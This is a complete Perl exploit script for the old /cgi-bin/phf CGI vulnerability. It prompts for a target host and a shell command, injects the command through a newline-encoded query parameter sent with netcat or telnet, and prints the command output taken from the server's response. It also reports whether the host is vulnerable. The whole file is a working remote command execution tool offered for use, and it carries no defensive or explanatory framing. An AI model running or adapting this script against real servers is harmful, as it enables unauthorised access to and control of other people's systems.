#!/usr/bin/perl
# Exploits bug in /cgi-bin/phf 
# Usage:  cgihack host arg1 arg2 arg3 ...

# change $client to telnet if you don't have netcat.
$client = "nc";

if ( $#ARGV < 0 ) {
  print("Host: ");
  chop($HOST = <>);
  print("Command: ");
  chop($CMD = <>);
  $RAW = "$HOST $CMD";
  @RAW = split(' ', $RAW);
  @ARGV = @RAW;
}

for ( $n = 1; $n < $#ARGV + 1; $n++ ) {
  $PHFARG = $PHFARG."$ARGV[$n]";
  $PHFARG = $PHFARG."%20" if ($n != $#ARGV); 
}

$C_ARG = "GET /cgi-bin/phf?Jserver=foobar.com%0A$PHFARG%0A&Qname=A";
open(OUTPUT, "echo \'$C_ARG\' | $client $ARGV[0] 80 |");

$go = 0;
while(<OUTPUT>) {
    print $_ if &isgood;
}
print "$ARGV[0] is not vulnerable\n" if ( $go == 0 ); 

sub isgood {  
  if ( /<PRE>/ ) {
    $go++;
    return(0);
  } elsif ( $go && ! /<\/PRE>/ ) {
    return(1);
  }
}